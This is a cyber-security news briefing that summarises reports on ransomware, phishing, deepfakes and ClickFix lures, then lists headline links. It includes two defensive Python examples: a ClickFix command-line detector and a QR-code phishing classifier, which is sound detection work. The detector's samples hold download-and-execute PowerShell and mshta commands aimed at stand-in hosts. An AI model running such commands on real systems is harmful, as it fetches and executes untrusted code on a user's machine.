Cyber Criminals Don’t Take Holidays Warns Expert
Semperis has found that cyber attacks during holidays and weekends pose a significant risk because many businesses are underprepared to handle incidents outside standard working hours, when security staffing and response capability are reduced. The report highlighted identity-related attacks as a major concern, yet a quarter of respondents feel they lack the expertise to protect against them, and over 22% have no identity recovery plan in place.
The Urgent and Critical Need to Prioritise Mobile Security
Recent findings reveal that mobile security threats are a top concern for organisations. With over 55% of organisations increasing their mobile device users and more than 70% of employees using smartphones for work tasks, threats like mobile phishing and malware are intensifying. The report indicates that 82% of phishing websites are designed for mobile users, and 200 malicious apps on Google Play have been downloaded 8 million times. Despite this, many organisations face challenges in mitigating mobile risks due to device diversity and user control, highlighting a critical need for improved mobile security measures.
Companies Take Over Seven Months to Recover from Cyber Incidents
A new report reveals that organisations are underestimating recovery times from cyber incidents, with actual recovery averaging over seven months, 25% longer than anticipated. This gap widens to nearly 11 months for companies reducing cyber security investments. Alongside efforts like implementing stronger security measures (43%) and offering additional employee training (41%), nearly half of organisations are rethinking how they use existing cyber security tools. The study also highlights a shift towards shared responsibility, with platform engineering teams and app developers increasingly held accountable alongside traditional roles like Chief Information Security Officers (CISOs) and CIOs.
Data is the New Uranium – Incredibly Powerful and Amazingly Dangerous
Recent insights from Chief Information Security Officers (CISOs) indicate that data-related risks are becoming a primary concern for organisations. The vast and dispersed nature of data storage has led many CISOs to feel that the cost of managing data now outweighs its value. There’s a growing perception that the business proposition of ‘big data’ is shifting from a net positive to a net negative. This underscores the urgent need for organisations to manage data carefully and to be fully aware of the risks and costs associated with potential breaches.
‘Scam Yourself’ Attacks Just Increased Over 600% - Here’s What to Look For
Gen, the company behind Norton and Avast, reports a 614% surge in ‘scam yourself’ cyber attacks in the third quarter compared to the second. These scams use social engineering to trick users into installing malware themselves. Notably, over two million people worldwide were targeted by fake captcha scams in the past quarter; these typically ask the user to prove they are ‘not a robot’ by pasting a command the page has silently placed on the clipboard into the Windows Run dialog or a terminal, which then downloads and runs the malware. Despite increased vigilance, users remain vulnerable to fake updates, deceptive fixes, and counterfeit tutorials that instruct them to disable antivirus software or run commands that compromise security.
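The ‘paste this command’ pattern above leaves a trace in what users actually ran, so it can be hunted after the fact. The following is an added example written for this briefing, not code from Gen or from any of the reports cited here: it scores command lines (for instance entries recovered from the Windows RunMRU registry key, which records what was typed into the Run dialog, or process-creation logs) against a set of assumed indicators of this lure. The indicator patterns, their weights, the threshold and the sample records are all constructed for illustration and would need tuning against real telemetry.

```python
import re

# Assumed indicator patterns for "paste this command" lures (illustrative; not taken from the briefing).
# Each entry: (name, weight, compiled regex). The weights are a constructed heuristic.
INDICATORS = [
    # download-and-execute cradle: fetch something, pipe it into Invoke-Expression
    ("download_cradle", 3, re.compile(
        r"\b(iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b.*\|\s*(iex|invoke-expression)\b",
        re.I)),
    # mshta pointed at a remote HTA file
    ("mshta_remote", 3, re.compile(r"\bmshta(?:\.exe)?\s+[\"']?https?://", re.I)),
    # executing whatever the web page put on the clipboard
    ("clipboard_exec", 3, re.compile(r"\bget-clipboard\b.*\|\s*(iex|invoke-expression)\b", re.I)),
    # base64-encoded command payload (legitimate admin tooling uses this too, hence the lower weight)
    ("encoded_command", 2, re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden_window", 1, re.compile(r"\s-w(?:indowstyle)?\s+hidden\b", re.I)),
    # the trailing comment that makes the pasted text look like a CAPTCHA step
    ("captcha_bait_comment", 2, re.compile(r"#\s*.*\b(not a robot|captcha|verification id)\b", re.I)),
]
THRESHOLD = 3  # assumed: one execution primitive on its own, or two weaker signals together


def score_command(cmd: str):
    """Return (score, [matched indicator names]) for one command line."""
    hits = [name for name, _, rx in INDICATORS if rx.search(cmd)]
    score = sum(w for name, w, _ in INDICATORS if name in hits)
    return score, hits


def is_clickfix_like(cmd: str) -> bool:
    return score_command(cmd)[0] >= THRESHOLD


def triage(events):
    """Keep only records whose command crosses the threshold, annotated with the matched indicators."""
    flagged = []
    for ev in events:
        score, hits = score_command(ev["command"])
        if score >= THRESHOLD:
            flagged.append({**ev, "score": score, "indicators": hits})
    return flagged


# Constructed sample records, shaped like entries recovered from the RunMRU key or process-creation logs.
# Hosts use the reserved .invalid TLD; nothing here points at a real site.
SAMPLE_EVENTS = [
    {"source": "RunMRU", "user": "jdoe",
     "command": 'powershell -w hidden -c "iwr http://cdn.invalid/x.ps1 | iex" '
                '# "I am not a robot - reCAPTCHA Verification ID: 7811"'},
    {"source": "RunMRU", "user": "asmith",
     "command": "mshta https://verify.invalid/check.hta"},
    {"source": "Sysmon", "user": "helpdesk",
     "command": 'powershell -NoProfile -Command "Get-ChildItem $env:TEMP | Measure-Object"'},
    {"source": "Sysmon", "user": "svc_backup",
     "command": "powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"source": "RunMRU", "user": "jdoe",
     "command": "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
]

if __name__ == "__main__":
    for rec in triage(SAMPLE_EVENTS):
        print(f'{rec["source"]:7} {rec["user"]:10} score={rec["score"]} {rec["indicators"]}')
```

The encoded-command sample on its own scores below the threshold on purpose: a lone base64 payload is common in legitimate management tooling, whereas combined with a hidden window, a download cradle or the ‘not a robot’ comment it is the lure described above.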
60% of Emails with QR Codes Classified as Spam or Malicious
Cisco Talos has found that 60% of emails containing QR codes are classified as spam, with some being malicious and targeting users with phishing or credential theft. Despite representing only about one in 500 global emails, these QR code emails effectively bypass security filters because the destination URL is embedded in an image rather than in the message text. Attackers use deceptive methods like blending QR codes into attractive designs. The report emphasises the importance of ‘defanging’ QR codes (altering the image so it no longer scans) in analysis output, and advises treating any URL decoded from a QR code with the same caution as an unknown link. Users should be vigilant when scanning QR codes and avoid entering credentials into unknown sites linked via QR codes.
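Applying the ‘treat it as an unknown URL’ advice at a mail gateway or in an analyst workflow means inspecting the decoded QR payload, not the image. The following is an added example written for this briefing, not code from Talos or from the report: it assumes the QR image has already been decoded to text by a QR library, classifies that text, and produces a defanged copy for display. The shortener list, the query keys, the lure words, the risk tiers and the sample payloads are all constructed for illustration; the domains use reserved example and .invalid names.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Assumed reference data for this example (illustrative, not from the Talos report)
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "is.gd", "cutt.ly", "qrco.de", "rb.gy"}
IDENTITY_KEYS = {"email", "e", "user", "login", "username"}  # query keys used to pre-fill the victim's address
LURE_WORDS = ("login", "signin", "verify", "mfa", "sso", "password", "reset")
HIGH_RISK = {"embedded_credentials", "ip_literal_host", "punycode_host", "prefilled_identity"}


def defang(url: str) -> str:
    """Render a URL non-clickable for analyst display: http -> hxxp, dots in the host -> [.]"""
    p = urlsplit(url)
    scheme = p.scheme.replace("http", "hxxp", 1) if p.scheme in ("http", "https") else p.scheme
    return urlunsplit((scheme, p.netloc.replace(".", "[.]"), p.path, p.query, p.fragment))


def assess_qr_payload(payload: str) -> dict:
    """Classify the decoded text of a QR code and list why it deserves suspicion."""
    payload = payload.strip()
    p = urlsplit(payload)
    findings = []
    if p.scheme in ("http", "https"):
        kind = "web_url"
    elif p.scheme:
        # wifi:, tel:, ms-appinstaller:, javascript: ... anything a phone may act on without a browser
        return {"kind": "other_uri", "findings": [f"non_web_scheme:{p.scheme}"], "display": payload}
    else:
        return {"kind": "text", "findings": findings, "display": payload}

    host = (p.hostname or "").lower()
    if p.username is not None:
        findings.append("embedded_credentials")   # https://bank.example@evil.example/ style trick
    try:
        ipaddress.ip_address(host)
        findings.append("ip_literal_host")
    except ValueError:
        pass
    if host in SHORTENERS:
        findings.append("url_shortener")          # hides the real destination
    if "xn--" in host:
        findings.append("punycode_host")          # possible homoglyph domain
    if p.scheme == "http":
        findings.append("cleartext_http")
    query = parse_qs(p.query)
    if IDENTITY_KEYS & {k.lower() for k in query}:
        findings.append("prefilled_identity")     # page already knows who the target is
    if any(w in (p.path + "?" + p.query).lower() for w in LURE_WORDS):
        findings.append("credential_lure_keywords")
    return {"kind": kind, "findings": findings, "display": defang(payload)}


def verdict(result: dict) -> str:
    """quarantine: strong phishing signals; flag: an analyst should look; pass: plain web URL."""
    if HIGH_RISK & set(result["findings"]):
        return "quarantine"
    return "flag" if result["findings"] else "pass"


# Constructed sample payloads, as a QR decoder would return them
SAMPLE_PAYLOADS = [
    "https://login.m365-verify.invalid/sso?email=jane.doe@victim.invalid",
    "http://bit.ly/3abcXYZ",
    "https://bank.example@192.0.2.10/verify",
    "WIFI:T:WPA;S:GuestNet;P:s3cret;;",
    "https://www.example.com/menu",
]

if __name__ == "__main__":
    for payload in SAMPLE_PAYLOADS:
        r = assess_qr_payload(payload)
        print(f'{verdict(r):10} {r["kind"]:9} {r["display"]}  {r["findings"]}')
```

Only the display copy is defanged; the original payload is what the checks run on, so a shortener or an IP-literal host is still recognised even though the analyst never sees a clickable link.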
Coalition Highlights 68% Surge in Ransomware Claims Severity, as Active Ransomware Groups Increase 56%
Coalition's latest report reveals a 68% surge in the severity of ransomware claims, with average losses escalating to $353,000. Searchlight Cyber has found a 56% increase in active ransomware groups in the first half of 2024, tracking 73 groups compared to 46 last year. This rise indicates that the fight against ransomware is far from over. The impact of ransomware has intensified, particularly affecting larger companies. Coalition also notes a rise in significant cyber risk aggregation events (single events that cause losses across many organisations at once) disrupting a substantial proportion of healthcare firms and auto dealerships with revenues over $100 million. Business email compromise remains the most common cyber incident, increasing by 4% and constituting nearly one-third of all cyber insurance claims. Meanwhile, claims severity overall rose by 14%.
One Deepfake Digital Identity Attack Strikes Every Five Minutes
Entrust has reported that deepfake attacks are occurring every five minutes in 2024, posing a significant threat to digital identity verification systems. The report found that deepfakes account for 24% of fraudulent attempts to bypass motion-based biometric checks used by banks and service providers. In contrast, only 5% of these attacks target basic selfie-based authentication methods. The growing accessibility of generative AI technology is enabling fraudsters to circumvent advanced security measures. Entrust highlighted that organisations must proactively adapt their security strategies, as these evolving threats are pervasive across all sectors.
Supply Chain Attacks Up Over 400% Since 2021
Cowbell Insurance has found that supply chain attacks have surged by 431% since 2021. Large enterprises with over $50 million in revenue are 2.5 times more likely to face cyber incidents. Manufacturing is the most vulnerable sector due to its reliance on automation and exposure to intellectual property threats. Public administration and educational services also face elevated risks, with a 70% increase in attacks on educational institutions over the past year. The report identifies five risky technology categories: operating systems, content management tools, virtualisation technologies, server-side technologies, and business applications. No business is immune to cyber threats and the consequences can be devastating.
Rethinking Cyber Security from Cost Centre to Value Driver
A University of Maryland study found that cyber attacks occur every 39 seconds, amounting to 2,244 attacks daily. Cybersecurity Ventures predicts annual cyber damages will reach $10.5 trillion by 2025. Despite these alarming figures, many organisations treat cyber security as a minimal compliance exercise. Leadership must transform this approach by integrating cyber security into business strategy, fostering a culture of trust and resilience. By prioritising employee training and leveraging technologies like artificial intelligence, companies can enhance customer loyalty, avoid regulatory issues, and shift cyber security from a cost centre to a value driver.
Majority of UK Businesses Lack Readiness for Rising AI-Led Phishing Attacks, Reveals Survey
Vodafone Business has found that most UK businesses are unprepared for the rapid rise in AI-led phishing attacks, which have increased 60% globally over the past year. Despite over three quarters of business leaders expressing confidence in employees' ability to detect scams, only a third could identify fraudulent communications. The report highlighted that over half of UK businesses lack a response plan for AI-driven phishing, and younger employees are particularly susceptible, with nearly half aged 18 to 24 not updating passwords in over a year.
Sources:
https://www.emergingrisks.co.uk/cyber-criminals-dont-take-holidays-warns-expert/
https://www.securityweek.com/the-urgent-and-critical-need-to-prioritize-mobile-security/
https://www.infosecurity-magazine.com/news/companies-seven-months-recover/
https://www.theregister.com/2024/11/20/data_is_the_new_uranium/
https://www.zdnet.com/article/scam-yourself-attacks-just-increased-over-600-heres-what-to-look-for/
https://www.infosecurity-magazine.com/news/60-emails-qr-codes-spam-malicious/
https://www.reinsurancene.ws/coalition-highlights-68-surge-in-ransomware-claims-severity/
https://securityintelligence.com/news/research-finds-56-percent-increase-active-ransomware-groups/
https://www.infosecurity-magazine.com/news/deepfake-identity-attack-every/
https://betanews.com/2024/11/21/supply-chain-attacks-up-over-400-percent-since-2021/
Governance, Risk and Compliance
Cyber security dominates concerns among the C-suite, small businesses and the nation
Rethinking Cyber Security From Cost Center To Value Driver
So, you don’t have a chief information security officer? 9 signs your company needs one | CSO Online
Cyber criminals don’t take holidays warns expert
Chris Inglis: Why cyber security success hinges on strategic choices, not just tech | SC Media
Data is the new uranium – both powerful and dangerous • The Register
Cyber Security is Everyone’s Responsibility - Security Boulevard
Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly
Hackers Aren’t Cutting Back, Why is Your Security Budget?
Full recovery from breaches takes longer than expected - Help Net Security
Google report shows CISOs must embrace change to stay secure - Help Net Security
Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs
Emerging Security Practices in Digital Finance: By Shiv Nanda
Poor cyber hygiene enabled nearly 30% of cyber attacks last quarter | StateScoop
Insights from Cohesity on cyber resilience as a technical team sport - SiliconANGLE
Interconnectivity and cyber risk: A double-edged sword - IT Security Guru
We Can Do Better Than Free Credit Monitoring After a Breach
Breaches Don't Have to Be Disasters
CISOs can now obtain professional liability insurance | CyberScoop
Experts warn businesses of escalating cyber security threats
CISOs Look to Establish Additional Leadership Roles - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
Armis: Triple Extortion Attacks Becoming More Common | SC Media UK
Research finds 56% increase in active ransomware groups
Ransomware gang Akira leaks unprecedented number of victims’ data in one day
Ransomware is doubling down—What you need to know about the recent surge - Security Boulevard
Akira Ransomware Racks Up 30+ Victims in a Single Day
Cloud ransomware threats rise, targeting S3 & Azure
FBI says BianLian based in Russia, moving from ransomware attacks to extortion
Ransomware Evolution: From Triple-Quadruple Extortion to RaaS - Security Boulevard
Coalition highlights 68% surge in ransomware claims severity - Reinsurance News
Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine
Hibernation is Over? Akira Ransomware: Published Over 30 New Victims on their DLS – DataBreaches.Net
Ransomware attacks primarily caused by poor cyber hygiene | SC Media
Cyber insurers address ransom reimbursement policy concerns | TechTarget
Ransomware Gangs on Recruitment Drive for Pen Testers - Infosecurity Magazine
Trellix report reveals evolving ransomware ecosystem trends
Security Bite: Ransomware groups surge in Q3 2024, with shifting dominance - 9to5Mac
Ransomware Attacks On Healthcare Sector Surge In 2024
Linux Variant of Helldown Ransomware Targets VMware
Helldown ransomware exploits Zyxel VPN flaw to breach networks
Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop
Threat Landscape: Corporate Japan Its Own Worst Enemy in the Ransomware War | Nippon.com
Ransomware Victims
How the British Library hack has caused havoc for UK research
SafePay ransomware gang claims attack on UK's Microlise • The Register
Ransomware Attack on Oklahoma Medical Center Impacts 133,000 - SecurityWeek
Change Healthcare’s clearing house restored after 9 months • The Register
Phishing & Email Based Attacks
Phishing emails increasingly use SVG attachments to evade detection
Communication platforms play a major role in data breach risks
You're Not Imagining It: Phishing Attacks Are Rampant
Why email security is still so bad today - 9to5Mac
Why AI alone can't protect you from sophisticated email threats - Help Net Security
Phishing Decoded: How Cyber Criminals Target You And How To Fight Back
Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey
60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine
What is a whaling attack (whaling phishing)? | Definition from TechTarget
Job termination scam warns staff of phony Employment Tribunal decision | CSO Online
'Scattered Spider' scammers charged in sophisticated, million-dollar phishing scheme | Mashable
Microsoft Takes Phishing-as-a-Service Platform to Court
Fake Donald Trump Assassination Story Used in Phishing Scam - Infosecurity Magazine
No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin
Microsoft 365 Admin portal abused to send sextortion emails
North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine
New phishing scam targeting companies with fake gov’t requests: What FBI says to do
Other Social Engineering
60% of Emails with QR Codes Classified as Spam or Malicious - Infosecurity Magazine
NCSC Warns UK Shoppers Lost £11.5m Last Christmas - Infosecurity Magazine
6 Reasons Social Engineering Is More Successful in Holiday Seasons | Mimecast
'Scam yourself' attacks just increased over 600% - here's what to look for | ZDNET
Malicious QR codes sent in the mail deliver malware | Malwarebytes
UK consumers losing more than ever to holiday scams | Computer Weekly
Fake Discount Sites Exploit Black Friday to Hijack Shopper Information
Security Alert: Fake Accounts Threaten Black Friday Gaming Sales - Security Boulevard
‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine
Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop
Watch Out for Malicious QR Codes Sent Through the Mail
Cyber security chief warns Black Friday shoppers to be alert to scams | The Standard
Don't Fall for This Fake Image Generator and Its Political AI Slop
No, Microsoft doesn't have dirt on you, it's just a sextortion scam - Neowin
Active network of North Korean IT front companies exposed - Help Net Security
You Can Prevent Smishing Scams With These Features and Tricks
Artificial Intelligence
AI fuels 244% surge in digital forgeries, says new study
97% of organisations hit by Gen AI-related security breaches, survey finds
One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine
Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks
Majority of UK businesses lack readiness for rising AI-led phishing attacks, reveals survey
Largest Companies View AI as a Risk Multiplier
Don't Fall for This Fake Image Generator and Its Political AI Slop
Phishing on the Rise: CUJO AI Blocks Over 12,000 Attacks per Minute
The limits of AI-based deepfake detection - Help Net Security
OWASP Warns of Growing Data Exposure Risk from AI in New Top 10 List - Infosecurity Magazine
Supply chain threats highlight security gaps in LLMs and AI | TechRadar
AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard
Fake AI video generators infect Windows, macOS with infostealers
AI About-Face: 'Mantis' Turns LLM Attackers Into Prey
Artificial intelligence, international security, and the risk of war
Did you play Pokémon Go? You didn't know it, but you were training AI to map the world | ZDNET
Malware
Phishing emails increasingly use SVG attachments to evade detection
Don’t Hold Down The Ctrl Key—New Warning As Cyber Attacks Confirmed
Malicious QR codes sent in the mail deliver malware | Malwarebytes
Fortinet VPN Zero-Day Exploited in Malware Attacks Remains Unpatched: Report - SecurityWeek
‘ClickFix’ Cyber-Attacks for Malware Deployment on the Rise - Infosecurity Magazine
Watch Out for Malicious QR Codes Sent Through the Mail
New Stealthy BabbleLoader Malware Spotted Delivering WhiteSnake and Meduza Stealers
Scammers resort to physical Swiss post to spread malware • The Register
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
Don't Fall for This Fake Image Generator and Its Political AI Slop
Fake AI video generators infect Windows, macOS with infostealers
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data
Warning: DEEPDATA Malware Exploiting Unpatched Fortinet Flaw to Steal VPN Credentials
Botnet exploits GeoVision zero-day to install Mirai malware
Researchers unearth two previously unknown Linux backdoors - Help Net Security
Lumma Stealer Proliferation Fueled by Telegram Activity - Infosecurity Magazine
Black Lotus, Emotet, Beep, and Dark Pink, still the top malware threats of 2024 | SC Media
Microsoft accused of Malware-like Bing Wallpaper app - gHacks Tech News
Bots/Botnets
'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse
Dangerous global botnet fueling residential proxies is being hit in major crackdown | TechRadar
Botnet serving as ‘backbone’ of malicious proxy network taken offline | CyberScoop
Mobile
The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek
No work phone? Companies tell staff to bring their own
Mobile UK on fraud ahead of Reeves' Mansion House speech
Google Issues New Security Cloaking Warning As Attackers Use AI In Attacks
Protect Your Phone From Juice Jacking: Public Charging Risks Explained
New Ghost Tap attack abuses NFC mobile payments to steal money
NSO Group used another WhatsApp zero-day after being sued, court docs say
LightSpy Spyware Operation Expands to Windows - SecurityWeek
It’s Time to Get Paranoid About Your Phone, Says This Security Expert | KQED
iOS 18 reboots iThings after 72 hours - secretly and smartly • The Register
This hacking tool can unlock an iPhone 16. Here's how it works | Digital Trends
You Can Prevent Smishing Scams With These Features and Tricks
Denial of Service/DoS/DDoS
DDoS Attack Growing Bigger & Dangerous, New Report Reveals
Internet of Things – IoT
Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek
'Water Barghest' Sells Hijacked IoT Devices for Proxy Botnet Misuse
Eken hit with $700K fine for putting an inactive address on FCC filings - The Verge
Data Breaches/Leaks
Ten Lessons Learned from The Mother of All Breaches Data Leak - Security Boulevard
97% of organisations hit by Gen AI-related security breaches, survey finds
Fintech giant Finastra confirms it's investigating a data breach | TechCrunch
Equinox discloses data breach involving health info of clients, staff | Reuters
T-Mobile confirms it was hacked in recent wave of telecom breaches
What is Data Egress? How It Works and How to Manage Costs | Definition from TechTarget
Threat actor sells data of +750,000 patients from a French hospital
US-UK Armed Forces Dating Service Exposes Over 1 Million Records Online
We Can Do Better Than Free Credit Monitoring After a Breach
Breaches Don't Have to Be Disasters
The Crucial Influence of Human Factors in Security Breaches - Security Boulevard
171K AnnieMac customers informed of data breach • The Register
Space tech giant Maxar confirms hacker accessed employees' personal data | TechCrunch
Ford 'actively investigating' breach claims • The Register
Ford rejects breach allegations, says customer data not impacted
Helpline for Yakuza victims fears it leaked personal info • The Register
Andrew Tate Hack: Online Course Data Breached
Organised Crime & Criminal Actors
Cyber criminals don’t take holidays warns expert
Microsoft killed 240 sites selling ONNX phishing kits
5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme
Threat Actor Turns Thousands of IoT Devices Into Residential Proxies - SecurityWeek
Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News
Targeting the Cyber Crime Supply Chain - Microsoft On the Issues
US seizes PopeyeTools cyber crime marketplace, charges administrators
AI in Cyber Crime: Hackers Exploiting OpenAI - Security Boulevard
Russian women stepping up for cyber crime outfits | SC Media
UK supports Nigeria to tackle cyber threats
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek
Now BlueSky hit with crypto scams as it crosses 20 million users
Insider Risk and Insider Threats
The Crucial Influence of Human Factors in Security Breaches - Security Boulevard
Insurance
Coalition highlights 68% surge in ransomware claims severity - Reinsurance News
Cyber insurers address ransom reimbursement policy concerns | TechTarget
Marsh launches cyber security compliance program | Insurance Business America
CISOs can now obtain professional liability insurance | CyberScoop
Supply Chain and Third Parties
Supply chain attacks up over 400 percent since 2021
Soaring cyber risks: Large enterprises, supply chains and key industries in the crosshairs
IT pros revise pipelines for software supply chain security | TechTarget
Gatwick Airport's Cyber Security Chief on Supply Chain Risks - Infosecurity Magazine
Cloud/SaaS
Cloud ransomware threats rise, targeting S3 & Azure
Cracking the Code: Tackling the Top 5 Cloud Security Challenges - Security Boulevard
Ransomware Groups Use Cloud Services For Data Exfiltration - Infosecurity Magazine
Outages
After the CrowdStrike disaster, Microsoft is improving Windows security to avoid outages
Identity and Access Management
One Deepfake Digital Identity Attack Hits Every Five Minutes - Infosecurity Magazine
The trouble with identity in an increasingly fake world | SC Media
Privileged Accounts, Hidden Threats: Why Privileged Access Security Must Be a Top Priority
10 Most Impactful PAM Use Cases for Enhancing Organisational Security
Encryption
Now Online Safety Act is law, UK outlines 'priorities' • The Register
NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition
Linux and Open Source
Ubuntu Linux impacted by decade-old 'needrestart' flaw that gives root
Debunking myths about open-source security - Help Net Security
Linux Variant of Helldown Ransomware Targets VMware
Researchers unearth two previously unknown Linux backdoors - Help Net Security
Passwords, Credential Stuffing & Brute Force Attacks
123456 is the world's most popular password – again | Tom's Guide
Research Highlights SHA256 Password Security Strengths and Risks - IT Security Guru
700,000 passengers suffered delays after password of engineer allowed to work remotely... - LBC
Navigating NIST’s updated password rotation guidelines | TechRadar
More than 200 major companies already support passkeys
Put your usernames and passwords in your will, Japan advises • The Register
Social Media
Ireland orders X, TikTok and Instagram to curb terrorist content | Ireland | The Guardian
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
Meta cracks down on millions of accounts it tied to pig-butchering scams | CyberScoop
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data
Canada Shuts Down TikTok Office Over National Security Risks
Now BlueSky hit with crypto scams as it crosses 20 million users
Malvertising
Fake Bitwarden ads on Facebook push info-stealing Chrome extension
NodeStealer Malware Targets Facebook Ad Accounts, Harvesting Credit Card Data
How does malvertising work? | TechTarget
Training, Education and Awareness
Cyber Awareness Is a Joke: Here’s How to Actually Prepare for Attacks
New educational campaign "Flex Your Cyber" launched - IT Security Guru
KnowBe4 Releases 2024 Holiday Kit to Boost Cyber Resilience - IT Security Guru
Regulations, Fines and Legislation
The SEC Cyber Security Rule: Awareness Rises, Compliance Lags - Security Boulevard
The Cyber Resilience Act published
NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra
ENISA's Draft NIS2 Guidance Consultation for Industry
Beyond The EU: How British Businesses Can Prepare For NIS2
EU Council approves declaration on international law in cyber space - JURIST - News
Preparing for DORA Compliance in 2025 - Financial News
Increased GDPR Enforcement Highlights the Need for Data Security
A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine
Now Online Safety Act is law, UK outlines 'priorities' • The Register
What CISOs need to know about the SEC’s breach disclosure rules | CSO Online
CISA no more? Rand Paul has a plan, and it’s not good for US cyber defenders | Cybernews
Trump 2.0 May Mean Fewer Cyber Security Regs
The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog
What a second Trump term means for the future of ransomware | TechCrunch
Why the NIS2 Directive causes growing pains for businesses - Help Net Security
CISA Dir. Jen Easterly to Resign on Inauguration Day
With Tech Considerations for Securities Lawyers | Mayer Brown Free Writings + Perspectives - JDSupra
Models, Frameworks and Standards
A Fifth of UK Enterprises “Not Sure” If NIS 2 Applies - Infosecurity Magazine
The Cyber Resilience Act published
NIS 2 Directive: Transposition Period is Up for EU Member States | Jones Day - JDSupra
ENISA's Draft NIS2 Guidance Consultation for Industry
Beyond The EU: How British Businesses Can Prepare For NIS2
Preparing for DORA Compliance in 2025 - Financial News
Increased GDPR Enforcement Highlights the Need for Data Security
NIST Publishes Draft Strategy For Post-Quantum Cryptography Transition
Backup and Recovery
Five backup lessons learned from the UnitedHealth ransomware attack - Help Net Security
Law Enforcement Action and Take Downs
5 Scattered Spider Gang Members Indicted in Multi-Million Dollar Cyber Crime Scheme
Brit charged in US over Scattered Spider cyber attacks | Computer Weekly
Man Who Stole and Laundered Roughly $1B in Bitcoin Is Sentenced to 5 Years in Prison - SecurityWeek
US seizes PopeyeTools cyber crime marketplace, charges administrators
Zimbabwe police arrest 1,000 cyber criminals - Bulawayo24 News
Alleged Russian Phobos ransomware administrator extradited to U.S., in custody | CyberScoop
UK supports Nigeria to tackle cyber threats
Misinformation, Disinformation and Propaganda
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Artificial intelligence, international security, and the risk of war
Sweden, Finland and Norway release new advice on surviving war - BBC News
Nation State Actors
China
A Look at Trending Chinese APT Techniques | Intel 471
UK warned of cyber threats from China-backed Volt Typhoon
China Espionage Soon ‘the Number 1 Issue’ for US Security Community: Cyber Security Expert | NTD
Chinese hackers are using this open-source VPN to mask spying activities | TechRadar
T-Mobile confirms it was hacked in recent wave of telecom breaches
Chinese Hackers Exploit T-Mobile and Other U.S. Telecoms in Broader Espionage Campaign
Cyber-espionage group Volt Typhoon resurfaces globally
LightSpy Spyware Operation Expands to Windows - SecurityWeek
China-Backed Hackers Leverage SIGTRAN, GSM Protocols to Infiltrate Telecom Networks
Chinese APT Group Targets Telecom Firms Linked to BRI - Infosecurity Magazine
Chinese spies, Musk’s biz ties, ‘a real risk’ to US security • The Register
Chinese spies and the security of America's networks
China's Liminal Panda APT Attacks Telcos, Steals Data
Chinese ship casts shadow over Baltic subsea cable snipfest • The Register
Canada Shuts Down TikTok Office Over National Security Risks
Lithuania bans remote Chinese access to solar, wind, storage devices – pv magazine International
Coast Guard Warns of Continued Risks in Chinese Port Cranes
Russia
Severed subsea internet cables raise network security questions | ITPro
Sweden, Finland and Norway release new advice on surviving war - BBC News
Russian women stepping up for cyber crime outfits | SC Media
FBI says BianLian based in Russia, moving from ransomware attacks to extortion
BianLian Ransomware Group Adopts New Tactics, Posing Significant Risk - Infosecurity Magazine
Russian sanctions busting linked to British Overseas Territories
Undersea cable between Germany and Finland severed - BBC News
Finland and Lithuania Report Severed Undersea Data Cables - Bloomberg
Fears of sabotage rise after Baltic cable disruptions
North Korea
North Korean Front Companies Impersonate US IT Firms to Fund Missile Programs
Active network of North Korean IT front companies exposed - Help Net Security
North Korean IT Worker Network Tied to BeaverTail Phishing Campaign - Infosecurity Magazine
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
LightSpy Spyware Operation Expands to Windows - SecurityWeek
NSO Group used another WhatsApp zero-day after being sued, court docs say
The Accountability Dilemma: Civilian Cyber Vigilantism and International Law | directions blog
Tools and Controls
The Urgent And Critical Need To Prioritize Mobile Security - SecurityWeek
No work phone? Companies tell staff to bring their own
Rethinking Cyber Security From Cost Center To Value Driver
Companies Take Over Seven Months to Recover From Cyber Incidents - Infosecurity Magazine
State of SIEM Detection Risk: A Wake-Up Call for Enterprise Security Teams - Security Boulevard
Why Custom IOCs Are Necessary for Advanced Threat Hunting and Detection - SecurityWeek
5 Threat Intel Tricks MSSPs Can Use to Thwart Adversaries | MSSP Alert
Underfunded, under pressure: We must act to support cyber teams | Computer Weekly
Overcoming the cyber paradox: Shrinking budgets – growing threats | Computer Weekly
